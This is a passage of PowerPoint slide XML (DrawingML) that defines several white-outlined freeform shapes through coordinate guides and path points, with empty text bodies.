                  <a:gd name="T8" fmla="*/ 57 w 189"/>
                  <a:gd name="T9" fmla="*/ 45 h 153"/>
                  <a:gd name="T10" fmla="*/ 72 w 189"/>
                  <a:gd name="T11" fmla="*/ 44 h 153"/>
                  <a:gd name="T12" fmla="*/ 88 w 189"/>
                  <a:gd name="T13" fmla="*/ 71 h 153"/>
                  <a:gd name="T14" fmla="*/ 102 w 189"/>
                  <a:gd name="T15" fmla="*/ 82 h 153"/>
                  <a:gd name="T16" fmla="*/ 119 w 189"/>
                  <a:gd name="T17" fmla="*/ 83 h 153"/>
                  <a:gd name="T18" fmla="*/ 131 w 189"/>
                  <a:gd name="T19" fmla="*/ 78 h 153"/>
                  <a:gd name="T20" fmla="*/ 128 w 189"/>
                  <a:gd name="T21" fmla="*/ 53 h 153"/>
                  <a:gd name="T22" fmla="*/ 112 w 189"/>
                  <a:gd name="T23" fmla="*/ 30 h 153"/>
                  <a:gd name="T24" fmla="*/ 122 w 189"/>
                  <a:gd name="T25" fmla="*/ 9 h 153"/>
                  <a:gd name="T26" fmla="*/ 134 w 189"/>
                  <a:gd name="T27" fmla="*/ 0 h 153"/>
                  <a:gd name="T28" fmla="*/ 143 w 189"/>
                  <a:gd name="T29" fmla="*/ 26 h 153"/>
                  <a:gd name="T30" fmla="*/ 147 w 189"/>
                  <a:gd name="T31" fmla="*/ 59 h 153"/>
                  <a:gd name="T32" fmla="*/ 157 w 189"/>
                  <a:gd name="T33" fmla="*/ 63 h 153"/>
                  <a:gd name="T34" fmla="*/ 168 w 189"/>
                  <a:gd name="T35" fmla="*/ 61 h 153"/>
                  <a:gd name="T36" fmla="*/ 172 w 189"/>
                  <a:gd name="T37" fmla="*/ 51 h 153"/>
                  <a:gd name="T38" fmla="*/ 189 w 189"/>
                  <a:gd name="T39" fmla="*/ 69 h 153"/>
                  <a:gd name="T40" fmla="*/ 187 w 189"/>
                  <a:gd name="T41" fmla="*/ 95 h 153"/>
                  <a:gd name="T42" fmla="*/ 180 w 189"/>
                  <a:gd name="T43" fmla="*/ 116 h 153"/>
                  <a:gd name="T44" fmla="*/ 170 w 189"/>
                  <a:gd name="T45" fmla="*/ 119 h 153"/>
                  <a:gd name="T46" fmla="*/ 149 w 189"/>
                  <a:gd name="T47" fmla="*/ 120 h 153"/>
                  <a:gd name="T48" fmla="*/ 132 w 189"/>
                  <a:gd name="T49" fmla="*/ 114 h 153"/>
                  <a:gd name="T50" fmla="*/ 116 w 189"/>
                  <a:gd name="T51" fmla="*/ 128 h 153"/>
                  <a:gd name="T52" fmla="*/ 104 w 189"/>
                  <a:gd name="T53" fmla="*/ 139 h 153"/>
                  <a:gd name="T54" fmla="*/ 83 w 189"/>
                  <a:gd name="T55" fmla="*/ 153 h 153"/>
                  <a:gd name="T56" fmla="*/ 63 w 189"/>
                  <a:gd name="T57" fmla="*/ 150 h 153"/>
                  <a:gd name="T58" fmla="*/ 51 w 189"/>
                  <a:gd name="T59" fmla="*/ 132 h 153"/>
                  <a:gd name="T60" fmla="*/ 64 w 189"/>
                  <a:gd name="T61" fmla="*/ 127 h 153"/>
                  <a:gd name="T62" fmla="*/ 75 w 189"/>
                  <a:gd name="T63" fmla="*/ 121 h 153"/>
                  <a:gd name="T64" fmla="*/ 88 w 189"/>
                  <a:gd name="T65" fmla="*/ 120 h 153"/>
                  <a:gd name="T66" fmla="*/ 99 w 189"/>
                  <a:gd name="T67" fmla="*/ 101 h 153"/>
                  <a:gd name="T68" fmla="*/ 73 w 189"/>
                  <a:gd name="T69" fmla="*/ 97 h 153"/>
                  <a:gd name="T70" fmla="*/ 50 w 189"/>
                  <a:gd name="T71" fmla="*/ 109 h 153"/>
                  <a:gd name="T72" fmla="*/ 35 w 189"/>
                  <a:gd name="T73" fmla="*/ 113 h 153"/>
                  <a:gd name="T74" fmla="*/ 20 w 189"/>
                  <a:gd name="T75" fmla="*/ 108 h 153"/>
                  <a:gd name="T76" fmla="*/ 6 w 189"/>
                  <a:gd name="T77" fmla="*/ 107 h 153"/>
                  <a:gd name="T78" fmla="*/ 0 w 189"/>
                  <a:gd name="T79" fmla="*/ 94 h 153"/>
                  <a:gd name="T80" fmla="*/ 14 w 189"/>
                  <a:gd name="T81" fmla="*/ 80 h 153"/>
                  <a:gd name="T82" fmla="*/ 36 w 189"/>
                  <a:gd name="T83" fmla="*/ 75 h 153"/>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189"/>
                  <a:gd name="T127" fmla="*/ 0 h 153"/>
                  <a:gd name="T128" fmla="*/ 189 w 189"/>
                  <a:gd name="T129" fmla="*/ 153 h 153"/>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189" h="153">
                    <a:moveTo>
                      <a:pt x="36" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="75"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36227" name="Freeform 360"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1203" y="969"/>
                <a:ext cx="48" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 46 w 48"/>
                  <a:gd name="T1" fmla="*/ 45 h 45"/>
                  <a:gd name="T2" fmla="*/ 36 w 48"/>
                  <a:gd name="T3" fmla="*/ 43 h 45"/>
                  <a:gd name="T4" fmla="*/ 20 w 48"/>
                  <a:gd name="T5" fmla="*/ 38 h 45"/>
                  <a:gd name="T6" fmla="*/ 17 w 48"/>
                  <a:gd name="T7" fmla="*/ 40 h 45"/>
                  <a:gd name="T8" fmla="*/ 15 w 48"/>
                  <a:gd name="T9" fmla="*/ 37 h 45"/>
                  <a:gd name="T10" fmla="*/ 8 w 48"/>
                  <a:gd name="T11" fmla="*/ 22 h 45"/>
                  <a:gd name="T12" fmla="*/ 0 w 48"/>
                  <a:gd name="T13" fmla="*/ 9 h 45"/>
                  <a:gd name="T14" fmla="*/ 1 w 48"/>
                  <a:gd name="T15" fmla="*/ 2 h 45"/>
                  <a:gd name="T16" fmla="*/ 19 w 48"/>
                  <a:gd name="T17" fmla="*/ 0 h 45"/>
                  <a:gd name="T18" fmla="*/ 30 w 48"/>
                  <a:gd name="T19" fmla="*/ 9 h 45"/>
                  <a:gd name="T20" fmla="*/ 40 w 48"/>
                  <a:gd name="T21" fmla="*/ 10 h 45"/>
                  <a:gd name="T22" fmla="*/ 41 w 48"/>
                  <a:gd name="T23" fmla="*/ 10 h 45"/>
                  <a:gd name="T24" fmla="*/ 48 w 48"/>
                  <a:gd name="T25" fmla="*/ 21 h 45"/>
                  <a:gd name="T26" fmla="*/ 47 w 48"/>
                  <a:gd name="T27" fmla="*/ 29 h 45"/>
                  <a:gd name="T28" fmla="*/ 48 w 48"/>
                  <a:gd name="T29" fmla="*/ 39 h 45"/>
                  <a:gd name="T30" fmla="*/ 46 w 48"/>
                  <a:gd name="T31" fmla="*/ 45 h 45"/>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48"/>
                  <a:gd name="T49" fmla="*/ 0 h 45"/>
                  <a:gd name="T50" fmla="*/ 48 w 48"/>
                  <a:gd name="T51" fmla="*/ 45 h 45"/>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48" h="45">
                    <a:moveTo>
                      <a:pt x="46" y="45"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="45"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36228" name="Freeform 361"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="791" y="930"/>
                <a:ext cx="112" cy="113"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 112"/>
                  <a:gd name="T1" fmla="*/ 113 h 113"/>
                  <a:gd name="T2" fmla="*/ 33 w 112"/>
                  <a:gd name="T3" fmla="*/ 108 h 113"/>
                  <a:gd name="T4" fmla="*/ 26 w 112"/>
                  <a:gd name="T5" fmla="*/ 94 h 113"/>
                  <a:gd name="T6" fmla="*/ 23 w 112"/>
                  <a:gd name="T7" fmla="*/ 91 h 113"/>
                  <a:gd name="T8" fmla="*/ 21 w 112"/>
                  <a:gd name="T9" fmla="*/ 92 h 113"/>
                  <a:gd name="T10" fmla="*/ 17 w 112"/>
                  <a:gd name="T11" fmla="*/ 98 h 113"/>
                  <a:gd name="T12" fmla="*/ 8 w 112"/>
                  <a:gd name="T13" fmla="*/ 100 h 113"/>
                  <a:gd name="T14" fmla="*/ 2 w 112"/>
                  <a:gd name="T15" fmla="*/ 92 h 113"/>
                  <a:gd name="T16" fmla="*/ 0 w 112"/>
                  <a:gd name="T17" fmla="*/ 82 h 113"/>
                  <a:gd name="T18" fmla="*/ 2 w 112"/>
                  <a:gd name="T19" fmla="*/ 74 h 113"/>
                  <a:gd name="T20" fmla="*/ 10 w 112"/>
                  <a:gd name="T21" fmla="*/ 71 h 113"/>
                  <a:gd name="T22" fmla="*/ 13 w 112"/>
                  <a:gd name="T23" fmla="*/ 67 h 113"/>
                  <a:gd name="T24" fmla="*/ 19 w 112"/>
                  <a:gd name="T25" fmla="*/ 63 h 113"/>
                  <a:gd name="T26" fmla="*/ 26 w 112"/>
                  <a:gd name="T27" fmla="*/ 50 h 113"/>
                  <a:gd name="T28" fmla="*/ 32 w 112"/>
                  <a:gd name="T29" fmla="*/ 44 h 113"/>
                  <a:gd name="T30" fmla="*/ 37 w 112"/>
                  <a:gd name="T31" fmla="*/ 38 h 113"/>
                  <a:gd name="T32" fmla="*/ 41 w 112"/>
                  <a:gd name="T33" fmla="*/ 27 h 113"/>
                  <a:gd name="T34" fmla="*/ 49 w 112"/>
                  <a:gd name="T35" fmla="*/ 20 h 113"/>
                  <a:gd name="T36" fmla="*/ 58 w 112"/>
                  <a:gd name="T37" fmla="*/ 17 h 113"/>
                  <a:gd name="T38" fmla="*/ 76 w 112"/>
                  <a:gd name="T39" fmla="*/ 12 h 113"/>
                  <a:gd name="T40" fmla="*/ 88 w 112"/>
                  <a:gd name="T41" fmla="*/ 13 h 113"/>
                  <a:gd name="T42" fmla="*/ 94 w 112"/>
                  <a:gd name="T43" fmla="*/ 3 h 113"/>
                  <a:gd name="T44" fmla="*/ 102 w 112"/>
                  <a:gd name="T45" fmla="*/ 0 h 113"/>
                  <a:gd name="T46" fmla="*/ 112 w 112"/>
                  <a:gd name="T47" fmla="*/ 15 h 113"/>
                  <a:gd name="T48" fmla="*/ 107 w 112"/>
                  <a:gd name="T49" fmla="*/ 18 h 113"/>
                  <a:gd name="T50" fmla="*/ 101 w 112"/>
                  <a:gd name="T51" fmla="*/ 26 h 113"/>
                  <a:gd name="T52" fmla="*/ 99 w 112"/>
                  <a:gd name="T53" fmla="*/ 34 h 113"/>
                  <a:gd name="T54" fmla="*/ 100 w 112"/>
                  <a:gd name="T55" fmla="*/ 43 h 113"/>
                  <a:gd name="T56" fmla="*/ 104 w 112"/>
                  <a:gd name="T57" fmla="*/ 58 h 113"/>
                  <a:gd name="T58" fmla="*/ 98 w 112"/>
                  <a:gd name="T59" fmla="*/ 58 h 113"/>
                  <a:gd name="T60" fmla="*/ 91 w 112"/>
                  <a:gd name="T61" fmla="*/ 61 h 113"/>
                  <a:gd name="T62" fmla="*/ 85 w 112"/>
                  <a:gd name="T63" fmla="*/ 82 h 113"/>
                  <a:gd name="T64" fmla="*/ 78 w 112"/>
                  <a:gd name="T65" fmla="*/ 81 h 113"/>
                  <a:gd name="T66" fmla="*/ 72 w 112"/>
                  <a:gd name="T67" fmla="*/ 51 h 113"/>
                  <a:gd name="T68" fmla="*/ 67 w 112"/>
                  <a:gd name="T69" fmla="*/ 46 h 113"/>
                  <a:gd name="T70" fmla="*/ 64 w 112"/>
                  <a:gd name="T71" fmla="*/ 47 h 113"/>
                  <a:gd name="T72" fmla="*/ 62 w 112"/>
                  <a:gd name="T73" fmla="*/ 56 h 113"/>
                  <a:gd name="T74" fmla="*/ 58 w 112"/>
                  <a:gd name="T75" fmla="*/ 66 h 113"/>
                  <a:gd name="T76" fmla="*/ 54 w 112"/>
                  <a:gd name="T77" fmla="*/ 85 h 113"/>
                  <a:gd name="T78" fmla="*/ 49 w 112"/>
                  <a:gd name="T79" fmla="*/ 90 h 113"/>
                  <a:gd name="T80" fmla="*/ 47 w 112"/>
                  <a:gd name="T81" fmla="*/ 101 h 113"/>
                  <a:gd name="T82" fmla="*/ 42 w 112"/>
                  <a:gd name="T83" fmla="*/ 112 h 113"/>
                  <a:gd name="T84" fmla="*/ 37 w 112"/>
                  <a:gd name="T85" fmla="*/ 113 h 113"/>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12"/>
                  <a:gd name="T130" fmla="*/ 0 h 113"/>
                  <a:gd name="T131" fmla="*/ 112 w 112"/>
                  <a:gd name="T132" fmla="*/ 113 h 113"/>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12" h="113">
                    <a:moveTo>
                      <a:pt x="37" y="113"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="113"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36229" name="Freeform 362"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="944" y="897"/>
                <a:ext cx="55" cy="40"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 55"/>
                  <a:gd name="T1" fmla="*/ 6 h 40"/>
                  <a:gd name="T2" fmla="*/ 44 w 55"/>
                  <a:gd name="T3" fmla="*/ 28 h 40"/>
                  <a:gd name="T4" fmla="*/ 40 w 55"/>
                  <a:gd name="T5" fmla="*/ 37 h 40"/>
                  <a:gd name="T6" fmla="*/ 27 w 55"/>
                  <a:gd name="T7" fmla="*/ 38 h 40"/>
                  <a:gd name="T8" fmla="*/ 19 w 55"/>
                  <a:gd name="T9" fmla="*/ 40 h 40"/>
                  <a:gd name="T10" fmla="*/ 6 w 55"/>
                  <a:gd name="T11" fmla="*/ 36 h 40"/>
                  <a:gd name="T12" fmla="*/ 2 w 55"/>
                  <a:gd name="T13" fmla="*/ 32 h 40"/>
                  <a:gd name="T14" fmla="*/ 0 w 55"/>
                  <a:gd name="T15" fmla="*/ 18 h 40"/>
                  <a:gd name="T16" fmla="*/ 2 w 55"/>
                  <a:gd name="T17" fmla="*/ 8 h 40"/>
                  <a:gd name="T18" fmla="*/ 12 w 55"/>
                  <a:gd name="T19" fmla="*/ 2 h 40"/>
                  <a:gd name="T20" fmla="*/ 18 w 55"/>
                  <a:gd name="T21" fmla="*/ 4 h 40"/>
                  <a:gd name="T22" fmla="*/ 35 w 55"/>
                  <a:gd name="T23" fmla="*/ 0 h 40"/>
                  <a:gd name="T24" fmla="*/ 38 w 55"/>
                  <a:gd name="T25" fmla="*/ 0 h 40"/>
                  <a:gd name="T26" fmla="*/ 55 w 55"/>
                  <a:gd name="T27" fmla="*/ 6 h 4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5"/>
                  <a:gd name="T43" fmla="*/ 0 h 40"/>
                  <a:gd name="T44" fmla="*/ 55 w 55"/>
                  <a:gd name="T45" fmla="*/ 40 h 4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5" h="40">
                    <a:moveTo>
                      <a:pt x="55" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="44" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="6"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36230" name="Freeform 363"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1177" y="834"/>
                <a:ext cx="53" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 53"/>
                  <a:gd name="T1" fmla="*/ 65 h 65"/>
                  <a:gd name="T2" fmla="*/ 21 w 53"/>
                  <a:gd name="T3" fmla="*/ 64 h 65"/>
